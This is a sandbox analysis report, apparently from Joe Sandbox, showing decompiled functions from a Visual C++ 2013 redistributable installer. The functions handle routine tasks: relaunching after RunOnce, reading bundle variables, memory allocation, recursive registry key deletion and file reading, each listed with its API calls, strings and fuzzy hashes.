Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: String$AllocVariant$ClearFreeInit
String ID:
API String ID: 347726874-0
Opcode ID: 11020d61f4f76a6d456e06374ad5dc4c7cd90c2f565d3c4844f2f8f316d1a8d3
Instruction ID: d0db65173fa09af061ad31482ac6667f1f0c3aad37ff099f65210bb3fd237b6e
Opcode Fuzzy Hash: 11020d61f4f76a6d456e06374ad5dc4c7cd90c2f565d3c4844f2f8f316d1a8d3
Instruction Fuzzy Hash: 6A211A71A1121AAFDB10EFA4D8C8AEEBBB8AF44795F144454FA01DF340D7B0D901CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01281226 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E01281226(void* __ecx, intOrPtr _a4, short _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* __edi;
				void* _t31;
				void* _t37;

				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_t37 = E01285873(_t31, __ecx, 0, _a4,  &_v16);
				if(_t37 >= 0) {
					_t37 = E012B1A74( &_v8, 0);
					if(_t37 >= 0) {
						_t23 = _v16;
						if(_v16 <= 0) {
							_t23 = 0x12ba5c8;
						}
						_t37 = E012AFF4A(_v8, _t23, _a8,  &_v12);
						if(_t37 < 0) {
							E012AFA86(_t37, "Failed to re-launch bundle process after RunOnce: %ls", _v8);
						}
						L9:
						if(_v12 != 0) {
							CloseHandle(_v12);
							_v12 = 0;
						}
						if(_v16 != 0) {
							E012B01E8(_v16);
						}
						if(_v8 != 0) {
							E012B01E8(_v8);
						}
						return _t37;
					}
					_push("Failed to get current process path.");
					L4:
					_push(_t37);
					E012AFA86();
					goto L9;
				}
				_push("Unable to get resume command line from the registry");
				goto L4;
			}

0x01281237
0x0128123a
0x0128123d
0x01281245
0x01281249
0x0128125c
0x01281260
0x01281271
0x01281276
0x01281278
0x01281278
0x0128128d
0x01281291
0x0128129c
0x012812a1
0x012812a4
0x012812a7
0x012812ac
0x012812b2
0x012812b2
0x012812b8
0x012812bd
0x012812bd
0x012812c5
0x012812ca
0x012812ca
0x012812d4
0x012812d4
0x01281262
0x01281267
0x01281267
0x01281268
0x00000000
0x0128126e
0x0128124b
0x00000000

APIs

Part of subcall function 01285873: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,?,?,?,01281245,?,?,00000000), ref: 012858C3

CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000000,?,?,?,?), ref: 012812AC

Strings

Failed to get current process path., xrefs: 01281262
Failed to re-launch bundle process after RunOnce: %ls, xrefs: 01281296
Unable to get resume command line from the registry, xrefs: 0128124B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Close$Handle
String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
API String ID: 187904097-642631345
Opcode ID: 5f1810ce2cf9ccced2b27cad9525d4c55808250a2cf7ff64c9ba19d84b08ae6a
Instruction ID: 511bd2ff794b272bad717b8f6c3f206853b7a728e933f3f56fe729ee47e91a6c
Opcode Fuzzy Hash: 5f1810ce2cf9ccced2b27cad9525d4c55808250a2cf7ff64c9ba19d84b08ae6a
Instruction Fuzzy Hash: D81181B2C21129FFDF12BB989C818EDFBB8AE54350B104156E514F3198E7714F629B90

Uniqueness

Uniqueness Score: -1.00%

Function 0128A4D2 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E0128A4D2(void* __ecx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void* __ebx;
				signed int _t13;
				struct _CRITICAL_SECTION* _t19;
				void* _t23;

				_t21 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t19 = _a4;
				EnterCriticalSection(_t19);
				_t23 = E01289B8D(_t19, _t21, _a8,  &_v8);
				_t13 = _v8;
				if(_t23 < 0 ||  *((intOrPtr*)(_t13 + 0x10)) != 0) {
					if(_t23 != 0x80070490) {
						if(_t23 >= 0) {
							_t23 = E012A0EDB(_t21, _t13 + 8, _a12);
							if(_t23 < 0) {
								_push(_a8);
								_push("Failed to get value as string for variable: %ls");
								goto L8;
							}
						} else {
							_push(_a8);
							_push("Failed to get value of variable: %ls");
							L8:
							_push(_t23);
							E012AFA86();
						}
					}
				} else {
					_t23 = 0x80070490;
				}
				LeaveCriticalSection(_t19);
				return _t23;
			}

0x0128a4d2
0x0128a4d5
0x0128a4d6
0x0128a4db
0x0128a4e0
0x0128a4f2
0x0128a4f4
0x0128a4f9
0x0128a50e
0x0128a512
0x0128a52a
0x0128a52e
0x0128a530
0x0128a533
0x00000000
0x0128a533
0x0128a514
0x0128a514
0x0128a517
0x0128a538
0x0128a538
0x0128a539
0x0128a53e
0x0128a512
0x0128a501
0x0128a501
0x0128a501
0x0128a542
0x0128a54d

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000000,?,?,01298347,?,WixBundleOriginalSource,?,00000000,?,01281E12,00000001,?,?,00000001), ref: 0128A4E0
LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,?,01298347,?,WixBundleOriginalSource,?,00000000,?,01281E12,00000001,?,?,00000001), ref: 0128A542

Strings

Failed to get value as string for variable: %ls, xrefs: 0128A533
Failed to get value of variable: %ls, xrefs: 0128A517

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2100416246
Opcode ID: 580bf97b55759ac773537cea86c3359c0e8c43cc0050728a849888b711dcd864
Instruction ID: 75f7640ebde7a6a23a3dc4e28bc296fecff1c200e8963add72445e26c4dc556d
Opcode Fuzzy Hash: 580bf97b55759ac773537cea86c3359c0e8c43cc0050728a849888b711dcd864
Instruction Fuzzy Hash: 6B01DFB2D72219BBCF226E54AC85EAE7B98AB00765F008112FE01B7241C73CDA4087B0

Uniqueness

Uniqueness Score: -1.00%

Function 0128A5CE Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E0128A5CE(void* __ecx, void* __edx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void* __ebx;
				struct _CRITICAL_SECTION* _t18;
				void* _t21;
				void* _t23;

				_t21 = __edx;
				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a4;
				EnterCriticalSection(_t18);
				_t23 = E01289B8D(_t18, _t20, _a8,  &_v8);
				if(_t23 != 0x80070490) {
					if(_t23 >= 0) {
						_t23 = E012A1091(_t21, _v8 + 8, _a12);
						if(_t23 < 0) {
							_push(_a8);
							_push("Failed to copy value of variable: %ls");
							goto L5;
						}
					} else {
						_push(_a8);
						_push("Failed to get value of variable: %ls");
						L5:
						_push(_t23);
						E012AFA86();
					}
				}
				LeaveCriticalSection(_t18);
				return _t23;
			}

0x0128a5ce
0x0128a5ce
0x0128a5d1
0x0128a5d2
0x0128a5d7
0x0128a5dc
0x0128a5ee
0x0128a5f6
0x0128a5fa
0x0128a615
0x0128a619
0x0128a61b
0x0128a61e
0x00000000
0x0128a61e
0x0128a5fc
0x0128a5fc
0x0128a5ff
0x0128a623
0x0128a623
0x0128a624
0x0128a629
0x0128a5fa
0x0128a62d
0x0128a638

APIs

EnterCriticalSection.KERNEL32(?,?,00000000,?,?,01296D32,?,?,?,?,?,?,01297221,?,?,?), ref: 0128A5DC
LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,01296D32,?,?,?,?,?,?,01297221,?,?,?), ref: 0128A62D

Strings

Failed to copy value of variable: %ls, xrefs: 0128A61E
Failed to get value of variable: %ls, xrefs: 0128A5FF

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
API String ID: 3168844106-2936390398
Opcode ID: 99dfbb9b2855d21664500e745f92758016bf669cac6510fcc0e9d796fa3eca0a
Instruction ID: 68cafbd72f81dbb080f8075016423930e8cab4b9132e11381e70128a2cf97cc6
Opcode Fuzzy Hash: 99dfbb9b2855d21664500e745f92758016bf669cac6510fcc0e9d796fa3eca0a
Instruction Fuzzy Hash: 83F0A472961225BBCF126F64DC45DDE7B589B543A5F008011FD01A7241C679DA1087E4

Uniqueness

Uniqueness Score: -1.00%

Function 012A87EC Relevance: 6.0, APIs: 4, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E012A87EC(void* __edx, void* __edi, void* __esi, void* __eflags, signed short* _a4, signed int* _a8) {
				signed int _v0;
				char* _v8;
				signed int _v12;
				char _v20;
				void* _t20;
				signed int _t21;
				signed int _t25;
				signed int _t28;
				signed int _t35;
				signed int _t36;
				char* _t45;
				signed int _t46;
				void* _t49;
				signed int _t50;
				signed short* _t51;
				void* _t52;
				signed int _t55;
				signed int _t56;
				void* _t57;
				signed short* _t59;
				signed int _t61;
				signed short* _t62;

				_t57 = __esi;
				_t52 = __edi;
				_t49 = __edx;
				while(1) {
					_t20 = E012AB4D0(_t49, _t52, _t57, _a4);
					if(_t20 != 0) {
						break;
					}
					_t21 = E012AB573(_t20, _a4);
					__eflags = _t21;
					if(_t21 == 0) {
						__eflags =  *0x12d4fd0 & 0x00000001;
						if(( *0x12d4fd0 & 0x00000001) == 0) {
							 *0x12d4fd0 =  *0x12d4fd0 | 0x00000001;
							__eflags =  *0x12d4fd0;
							_push(1);
							_v8 = "bad allocation";
							E012AB282(0x12d4fc4,  &_v8);
							 *0x12d4fc4 = 0x12ceba0;
							E012AB4B9( *0x12d4fd0, 0x12b9b60);
						}
						_t45 =  &_v20;
						E012AB371(_t45, 0x12d4fc4);
						_v20 = 0x12ceba0;
						E012AB59B( &_v20, 0x12d1e8c);
						asm("int3");
						_push(_t45);
						_t25 = _v8;
						__eflags = _t25;
						if(__eflags != 0) {
							_push(0x12ceba0);
							_t59 = _a4;
							__eflags = _t59;
							if(__eflags == 0) {
								L12:
								 *((intOrPtr*)(E012AA279(__eflags))) = 0x16;
								E012AA227();
								_t28 = 0;
							} else {
								_t46 = _v0;
								__eflags = _t46;
								if(_t46 != 0) {
									L13:
									_t50 =  *_t46 & 0x0000ffff;
									_push(0x12d4fc4);
									__eflags = _t50;
									if(_t50 != 0) {
										_t56 =  *_t59 & 0x0000ffff;
										do {
											_t62 = _a4;
											__eflags = _t56;
											if(_t56 != 0) {
												_t36 = _t56;
												while(1) {
													__eflags = _t36 - _t50;
													if(_t36 == _t50) {
														goto L19;
													}
													_t62 =  &(_t62[1]);
													_t36 =  *_t62 & 0x0000ffff;
													__eflags = _t36;
													if(_t36 != 0) {
														continue;
													}
													goto L19;
												}
											}
											L19:
											__eflags =  *_t62;
											if( *_t62 != 0) {
												goto L20;
											}
											goto L21;
											L20:
											_t46 = _t46 + 2;
											_t50 =  *_t46 & 0x0000ffff;
											__eflags = _t50;
										} while (_t50 != 0);
									}
									L21:
									__eflags =  *_t46;
									_v12 = _t46;
									if( *_t46 != 0) {
										_t55 =  *_a4 & 0x0000ffff;
										do {
											_t51 = _a4;
											__eflags = _t55;
											if(_t55 != 0) {
												_t61 =  *_t46 & 0x0000ffff;
												_t35 = _t55;
												while(1) {
													__eflags = _t35 - _t61;
													if(_t35 == _t61) {
														goto L27;
													}
													_t51 =  &(_t51[1]);
													_t35 =  *_t51 & 0x0000ffff;
													__eflags = _t35;
													if(_t35 != 0) {
														continue;
													}
													goto L27;
												}
											}
											L27:
											__eflags =  *_t51;
											if( *_t51 != 0) {
												 *_t46 = 0;
												_t46 = _t46 + 2;
												__eflags = _t46;
											} else {
												goto L28;
											}
											goto L31;
											L28:
											_t46 = _t46 + 2;
											__eflags =  *_t46;
										} while ( *_t46 != 0);
									}
									L31:
									 *_a8 = _t46;
									asm("sbb eax, eax");
									_t28 =  ~(_v12 - _t46) & _v12;
									__eflags = _t28;
								} else {
									_t46 =  *_t25;
									__eflags = _t46;
									if(__eflags != 0) {
										goto L13;
									} else {
										goto L12;
									}
								}
							}
							return _t28;
						} else {
							 *((intOrPtr*)(E012AA279(__eflags))) = 0x16;
							E012AA227();
							__eflags = 0;
							return 0;
						}
					} else {
						continue;
					}
					L33:
				}
				return _t20;
				goto L33;
			}

0x012a87ec
0x012a87ec
0x012a87ec
0x012a8803
0x012a8806
0x012a880e
0x00000000
0x00000000
0x012a87f9
0x012a87ff
0x012a8801
0x012a8812
0x012a8823
0x012a8825
0x012a8825
0x012a882c
0x012a8834
0x012a883b
0x012a8845
0x012a884b
0x012a8850
0x012a8852
0x012a8855
0x012a8863
0x012a8866
0x012a886b
0x012a8871
0x012a8872
0x012a8875
0x012a8877
0x012a888d
0x012a888e
0x012a8891
0x012a8893
0x012a88a2
0x012a88a7
0x012a88ad
0x012a88b2
0x012a8895
0x012a8895
0x012a8898
0x012a889a
0x012a88b9
0x012a88b9
0x012a88bc
0x012a88bd
0x012a88c0
0x012a88c2
0x012a88c5
0x012a88c5
0x012a88c8
0x012a88cb
0x012a88cd
0x012a88cf
0x012a88cf
0x012a88d2
0x00000000
0x00000000
0x012a88d4
0x012a88d7
0x012a88da
0x012a88dd
0x00000000
0x00000000
0x00000000
0x012a88dd
0x012a88cf
0x012a88df
0x012a88df
0x012a88e3
0x00000000
0x00000000
0x00000000
0x012a88e5
0x012a88e5
0x012a88e8
0x012a88eb
0x012a88eb
0x012a88c5
0x012a88f0
0x012a88f0
0x012a88f4
0x012a88f7
0x012a88fc
0x012a88ff
0x012a88ff
0x012a8902
0x012a8905
0x012a8907
0x012a890a
0x012a890c
0x012a890c
0x012a890f
0x00000000
0x00000000
0x012a8911
0x012a8914
0x012a8917
0x012a891a
0x00000000
0x00000000
0x00000000
0x012a891a
0x012a890c
0x012a891c
0x012a891c
0x012a8920
0x012a892f
0x012a8932
0x012a8932
0x00000000
0x00000000
0x00000000
0x00000000
0x012a8922
0x012a8922
0x012a8925
0x012a8925
0x012a892b
0x012a8935
0x012a8938
0x012a8941
0x012a8943
0x012a8943
0x012a889c
0x012a889c
0x012a889e
0x012a88a0
0x00000000
0x00000000
0x00000000
0x00000000
0x012a88a0
0x012a889a
0x012a8949
0x012a8879
0x012a887e
0x012a8884
0x012a8889
0x012a888c
0x012a888c
0x00000000
0x00000000
0x00000000
0x00000000
0x012a8801
0x012a8811
0x00000000

APIs

_malloc.LIBCMT ref: 012A8806

Part of subcall function 012AB4D0: __FF_MSGBANNER.LIBCMT ref: 012AB4E9
Part of subcall function 012AB4D0: __NMSG_WRITE.LIBCMT ref: 012AB4F0
Part of subcall function 012AB4D0: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,012ABF87,00000000,00000001,00000000,?,012AB736,00000018,012D1FB0,0000000C,012AB7C6), ref: 012AB515

std::exception::exception.LIBCMT ref: 012A883B
std::exception::exception.LIBCMT ref: 012A8855
__CxxThrowException@8.LIBCMT ref: 012A8866

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: fd67356ed5ded14a827e24cab0adae82dd0c143ceee8806b6d3664f511840190
Instruction ID: 3ac130e2a2fd7076167c012292a969707c00a7a050b4755d87ad1ee740cab690
Opcode Fuzzy Hash: fd67356ed5ded14a827e24cab0adae82dd0c143ceee8806b6d3664f511840190
Instruction Fuzzy Hash: AAF0F43592020EAFDF14FB59F818ABD3FA8BB50714F900559E600A6990DB708B41C350

Uniqueness

Uniqueness Score: -1.00%

Function 012B396D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144
registryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E012B396D(void* __ecx, void* __edx, void* _a4, short* _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v12;
				char _v16;
				signed int _v20;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				void* _t52;
				void* _t56;
				signed int _t59;
				void* _t60;
				signed int _t61;
				signed int _t63;

				_t56 = __edx;
				_t52 = __ecx;
				_t60 = _a4;
				_t59 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				_v20 = 0;
				if(_a16 == 0) {
					L10:
					__eflags =  *0x12d5df0; // 0x0
					if(__eflags != 0) {
						L13:
						_t33 = _a12 - 1;
						__eflags = _t33;
						if(_t33 == 0) {
							_v20 = 0x200;
						} else {
							__eflags = _t33 == 1;
							if(_t33 == 1) {
								_v20 = 0x100;
							}
						}
						_t34 =  *0x12d5de4; // 0x0
						__eflags = _t34;
						if(_t34 == 0) {
							_t35 = RegDeleteKeyW(_t60, _a8);
							_t61 = _t35;
							__eflags = _t35;
							if(_t35 > 0) {
								_t61 = _t61 & 0x0000ffff | 0x80070000;
								__eflags = _t61;
							}
							__eflags = _t61 - 0x80070002;
							if(_t61 != 0x80070002) {
								__eflags = _t35;
								if(__eflags == 0) {
									goto L38;
								}
								if(__eflags > 0) {
									_t35 = _t35 & 0x0000ffff | 0x80070000;
									__eflags = _t35;
								}
								_t59 = _t35;
								__eflags = _t59;
								if(_t59 >= 0) {
									_t59 = 0x80004005;
								}
								_push(_t59);
								_push(0x103);
								goto L37;
							} else {
								goto L30;
							}
						} else {
							_t35 =  *_t34(_t60, _a8, _v20, 0);
							_t63 = _t35;
							__eflags = _t35;
							if(_t35 > 0) {
								_t63 = _t63 & 0x0000ffff | 0x80070000;
								__eflags = _t63;
							}
							__eflags = _t63 - 0x80070002;
							if(_t63 == 0x80070002) {
								L30:
								_t59 = 0x80070002;
							} else {
								__eflags = _t35;
								if(__eflags == 0) {
									L38:
									if(_v8 != 0) {
										RegCloseKey(_v8);
										_v8 = _v8 & 0x00000000;
									}
									if(_v12 != 0) {
										E012B01E8(_v12);
									}
									if(_v16 != 0) {
										E012B01E8(_v16);
									}
									return _t59;
								}
								if(__eflags > 0) {
									_t35 = _t35 & 0x0000ffff | 0x80070000;
									__eflags = _t35;
								}
								_t59 = _t35;
								__eflags = _t59;
								if(_t59 >= 0) {
									_t59 = 0x80004005;
								}
								_push(_t59);
								_push(0xfa);
								L37:
								_push("regutil.cpp");
								E012B294E(_t35);
							}
							goto L38;
						}
					}
					__eflags = _a12;
					if(_a12 == 0) {
						goto L13;
					}
					_t59 = 0x80070057;
					goto L38;
				}
				_t59 = E012B378B(_t60, _a8, 0x20019,  &_v8);
				if(_t59 != 0x80070002) {
					while(1) {
						__eflags = _t59;
						if(_t59 < 0) {
							break;
						}
						_t59 = E012B37F2(_t52, _v8, 0,  &_v12);
						__eflags = _t59 - 0x80070103;
						if(_t59 == 0x80070103) {
							_t59 = 0;
							__eflags = 0;
							goto L10;
						}
						__eflags = _t59;
						if(_t59 < 0) {
							goto L38;
						}
						_t59 = E012B201F(_t52, _t56, _a8, _v12,  &_v16);
						__eflags = _t59;
						if(_t59 < 0) {
							goto L38;
						}
						_t59 = E012B396D(_t52, _t56, _t60, _v16, _a12, _a16);
					}
					goto L38;
				}
				_t59 = 0;
				goto L38;
			}

0x012b396d
0x012b396d
0x012b3975
0x012b3979
0x012b397b
0x012b397e
0x012b3981
0x012b3984
0x012b398f
0x012b3a05
0x012b3a07
0x012b3a0d
0x012b3a1e
0x012b3a21
0x012b3a21
0x012b3a22
0x012b3a30
0x012b3a24
0x012b3a24
0x012b3a25
0x012b3a27
0x012b3a27
0x012b3a25
0x012b3a37
0x012b3a3c
0x012b3a3e
0x012b3a83
0x012b3a93
0x012b3a95
0x012b3a97
0x012b3a9b
0x012b3a9b
0x012b3a9b
0x012b3a9d
0x012b3a9f
0x012b3aa5
0x012b3aa7
0x00000000
0x00000000
0x012b3aa9
0x012b3aad
0x012b3aad
0x012b3aad
0x012b3aaf
0x012b3ab1
0x012b3ab3
0x012b3ab5
0x012b3ab5
0x012b3aba
0x012b3abb
0x00000000
0x00000000
0x00000000
0x00000000
0x012b3a40
0x012b3a48
0x012b3a54
0x012b3a56
0x012b3a58
0x012b3a5c
0x012b3a5c
0x012b3a5c
0x012b3a5e
0x012b3a60
0x012b3aa1
0x012b3aa1
0x012b3a62
0x012b3a62
0x012b3a64
0x012b3aca
0x012b3ace
0x012b3ad3
0x012b3ad9
0x012b3ad9
0x012b3ae1
0x012b3ae6
0x012b3ae6
0x012b3aef
0x012b3af4
0x012b3af4
0x012b3aff
0x012b3aff
0x012b3a66
0x012b3a6a
0x012b3a6a
0x012b3a6a
0x012b3a6c
0x012b3a6e
0x012b3a70
0x012b3a72
0x012b3a72
0x012b3a77
0x012b3a78
0x012b3ac0
0x012b3ac0
0x012b3ac5
0x012b3ac5
0x00000000
0x012b3a60
0x012b3a3e
0x012b3a0f
0x012b3a12
0x00000000
0x00000000
0x012b3a14
0x00000000
0x012b3a14
0x012b39a3
0x012b39a7
0x012b39fa
0x012b39fa
0x012b39fc
0x00000000
0x00000000
0x012b39be
0x012b39c0
0x012b39c6
0x012b3a03
0x012b3a03
0x00000000
0x012b3a03
0x012b39c8
0x012b39ca
0x00000000
0x00000000
0x012b39df
0x012b39e1
0x012b39e3
0x00000000
0x00000000
0x012b39f8
0x012b39f8
0x00000000
0x012b39fe
0x012b39a9
0x00000000

APIs

RegCloseKey.ADVAPI32(00000000), ref: 012B3AD3

Part of subcall function 012B378B: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,01291F19,?,00000009,00000000,?,01291BE1,80000002,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001), ref: 012B379F

Strings

regutil.cpp, xrefs: 012B3AC0

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseOpen
String ID: regutil.cpp
API String ID: 47109696-955085611
Opcode ID: 136d7483db2dbec52a8bafda6950af9052ee0793f92807d8973fb821b050a5cf
Instruction ID: ef4789c823b69fcbd71a3f7090f063232b1a0dd02f5e50106cde0f2fb3ff59e0
Opcode Fuzzy Hash: 136d7483db2dbec52a8bafda6950af9052ee0793f92807d8973fb821b050a5cf
Instruction Fuzzy Hash: 9F41B236D20507ABDB22DA58CC84AFEBAB6BF80390F394129EB15E7150DB75CA019750

Uniqueness

Uniqueness Score: -1.00%

Function 012B57EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95
fileCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E012B57EB(void* _a4, intOrPtr _a8, long _a12, signed int _a16, intOrPtr* _a20) {
				signed int _v8;
				void _v4104;
				struct _OVERLAPPED* _v4108;
				long _v4112;
				void* _v4120;
				intOrPtr _v4124;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				signed int _t40;
				signed int _t44;
				signed int _t50;
				intOrPtr* _t51;
				long _t52;
				intOrPtr _t56;
				signed int _t58;
				void* _t65;

				E012AE8C0(0x1018);
				_t36 =  *0x12d40d0; // 0xaab4e29e
				_v8 = _t36 ^ _t58;
				_t51 = _a20;
				_v4120 = _a4;
				_v4124 = _a8;
				_v4108 = 0;
				_t56 = 0;
				do {
					_t52 = _a12;
					if(_t52 != 0 || _a16 != 0) {
						_t40 = _a16;
						_t52 = _t52 - _t56;
						asm("sbb eax, esi");
						__eflags = _t40;
						if(__eflags < 0) {
							L8:
							_v4112 = _t40;
							L9:
							_v4112 = _t52;
							goto L10;
						}
						if(__eflags > 0) {
							L7:
							_t52 = 0x1000;
							_v4112 = 0;
							goto L9;
						}
						__eflags = _t52 - 0x1000;
						if(_t52 <= 0x1000) {
							goto L8;
						}
						goto L7;
					} else {
						_v4112 = 0x1000;
						L10:
						if(ReadFile(_v4120,  &_v4104, _v4112,  &_v4112, 0) == 0) {
							_t44 = GetLastError();
							__eflags = _t44;
							if(_t44 > 0) {
								_t44 = _t44 & 0x0000ffff | 0x80070000;
								__eflags = _t44;
							}
							_v4108 = _t44;
							__eflags = _t44;
							if(_t44 >= 0) {
								_v4108 = 0x80004005;
							}
							E012B294E(_t44, "fileutil.cpp", 0x36c, _v4108);
							L19:
							return E012A7EAA(_v4108, _t51, _v8 ^ _t58, 0, _t56, 0);
						}
						if(_v4112 == 0) {
							goto L13;
						}
						_t50 = E012B5783(_t52, _v4124,  &_v4104, _v4112);
						_v4108 = _t50;
						if(_t50 < 0) {
							goto L19;
						}
					}
					L13:
					_t56 = _t56 + _v4112;
					asm("adc esi, 0x0");
					_t65 = 0 - _a16;
				} while (_t65 <= 0 && (_t65 < 0 || _t56 < _a12) && _v4112 != 0);
				if(_t51 != 0) {
					 *_t51 = _t56;
					 *((intOrPtr*)(_t51 + 4)) = 0;
				}
				goto L19;
			}

0x012b57f3
0x012b57f8
0x012b57ff
0x012b5806
0x012b580a
0x012b5816
0x012b581c
0x012b5822
0x012b5824
0x012b5824
0x012b582b
0x012b583e
0x012b5841
0x012b5843
0x012b5845
0x012b5847
0x012b5860
0x012b5860
0x012b5866
0x012b5866
0x00000000
0x012b5866
0x012b5849
0x012b5853
0x012b5853
0x012b5858
0x00000000
0x012b5858
0x012b584b
0x012b5851
0x00000000
0x00000000
0x00000000
0x012b5832
0x012b5832
0x012b586c
0x012b588f
0x012b58fe
0x012b5904
0x012b5906
0x012b590d
0x012b590d
0x012b590d
0x012b5912
0x012b5918
0x012b591a
0x012b591c
0x012b591c
0x012b5936
0x012b58e7
0x012b58fb
0x012b58fb
0x012b5898
0x00000000
0x00000000
0x012b58ad
0x012b58b2
0x012b58ba
0x00000000
0x00000000
0x012b58ba
0x012b58bc
0x012b58bc
0x012b58c2
0x012b58c5
0x012b58c5
0x012b58e0
0x012b58e2
0x012b58e4
0x012b58e4
0x00000000

APIs

ReadFile.KERNEL32(?,?,?,?,00000000,00000000,75BDA770,00000000,?,01297B78,?,?,?,00000000,00000000,?), ref: 012B5887
GetLastError.KERNEL32(?,01297B78,?,?,?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,0128130D,?,?), ref: 012B58FE

Strings

fileutil.cpp, xrefs: 012B5931

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: fileutil.cpp
API String ID: 1948546556-2967768451
